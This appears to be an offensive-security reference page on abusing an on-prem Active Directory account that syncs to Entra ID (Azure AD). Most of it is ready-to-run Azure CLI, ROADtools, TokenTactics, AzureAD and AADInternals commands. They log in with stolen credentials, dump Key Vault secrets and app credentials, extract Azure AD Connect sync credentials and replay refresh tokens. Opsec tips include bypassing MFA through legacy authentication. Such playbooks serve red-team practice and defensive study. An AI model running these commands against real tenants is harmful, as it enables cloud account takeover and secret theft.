SyncedToEntraUser

An on-premises AD user is synchronized to an Entra ID (Azure AD) account via Azure AD Connect. Compromising the on-prem account grants access to the cloud identity.

Applies to: User (on-prem AD) → User (Entra ID)

Linux Abuse

Authenticate to Azure with on-prem creds (Azure CLI)

az login -u '<username>@<domain>' -p '<password>'
az account show
az ad signed-in-user show

Authenticate with access token (ROADtools / TokenTactics)

# Get token via ROADlib
roadrecon auth -u '<username>@<domain>' -p '<password>'
roadrecon gather
roadrecon gui

TokenTactics — get token

# PowerShell via pwsh on Linux
Import-Module ./TokenTactics.ps1
Get-AzureToken -Client MSGraph

GraphRunner — enumerate with token

# After obtaining access token:
Invoke-GraphRunner -Tokens $tokens

Azure CLI — enumerate roles and resources

az role assignment list --all --assignee '<object-id>'
az group list
az vm list
az keyvault list
az storage account list

Dump Azure AD secrets (if GA or privileged role)

az ad app list --all
az ad sp credential list --id <app-id>
az keyvault secret list --vault-name <vault-name>
az keyvault secret show --vault-name <vault-name> --name <secret-name>

AADInternals — read Azure info (pwsh)

pwsh -c "Import-Module AADInternals; Get-AADIntAccessTokenForMSGraph -Credentials (Get-Credential) | Read-AADIntAccesstoken"

Windows Abuse

Connect to Azure AD (AzureAD module)

Import-Module AzureAD
$cred = Get-Credential  # use <username>@<domain> UPN
Connect-AzureAD -Credential $cred
Get-AzureADUser -ObjectId '<username>@<domain>'
Get-AzureADDirectoryRole | Get-AzureADDirectoryRoleMember

Connect with Az module

Import-Module Az
Connect-AzAccount -Credential $cred
Get-AzRoleAssignment
Get-AzResource
Get-AzVM

Enumerate group memberships

Get-AzureADUserMembership -ObjectId '<object-id>'

Dump app credentials (if privileged)

Get-AzureADApplication | ForEach-Object {
    Get-AzureADApplicationPasswordCredential -ObjectId $_.ObjectId
}

Azure AD Connect — extract sync account creds (on AAD Connect server, requires SYSTEM or AAD Connect admin)

# AADInternals
Import-Module AADInternals
Get-AADIntSyncCredentials

Pass-the-token (refresh token reuse)

Import-Module TokenTactics.ps1
$tokens = Get-AzureToken -Client MSGraph
Invoke-RefreshToMSGraphToken -refreshToken $tokens.refresh_token -tenantid <tenant-id>

Opsec

Azure sign-in logs capture every authentication with IP, device, location
Legacy protocol auth (Basic Auth to Exchange, SMTP) bypasses Conditional Access — try if MFA enforced
Refresh tokens are long-lived (up to 90 days) — stealing the refresh token is more durable than password
Azure AD Connect MSOL sync account has DCSync rights on-prem — compromising AADConnect server is a direct path to DCSync
Check for Password Hash Sync (PHS) vs Pass-through Auth (PTA) vs Federation — affects which attacks work